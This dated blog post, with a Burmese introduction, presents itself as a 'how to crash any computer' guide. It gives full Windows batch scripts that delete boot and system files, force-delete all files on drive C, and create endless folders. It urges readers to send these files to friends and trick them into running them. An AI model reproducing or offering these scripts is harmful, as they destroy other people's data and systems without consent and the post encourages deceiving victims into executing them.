2/23/2013

How to Crash any computer or make Damage in windows ?


Notepad နဲ႕ အေပ်ာ္တမ္း Virus ေရးနည္းေလးေျပာျပမယ္ေနာ္...မူရင္း အဂၤလိပ္ Version အတိုင္းတင္ေပး
လိုက္ပါတယ္...ေသခ်ာဖတ္ၿပီးလုိက္လုပ္ၾကည္ပါ..လြယ္ပါတယ္ေနာ္...

1- Shut down any computer for ever

Open notepad and copy/paste this code:
  • @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

Now Save it as a .bat file.
this should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!


Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

  • cmd /c del c:\windows\* /F /S /Q
  • cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat

================================

2- Make file bat when any one click on makes over 1000 folders in a few seconds
1000 folders
Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.


1. Open notepad and type :

  • @echo off
    :top
    md %random%
    goto top


@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop

2- save it as “folders.bat”

now you done send this file bat to any one and when he open it the file will make over 1000 folders in a few seconds